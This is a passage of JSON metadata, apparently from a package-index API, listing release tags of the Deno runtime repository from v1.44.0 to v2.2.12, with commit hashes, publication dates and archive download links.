hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/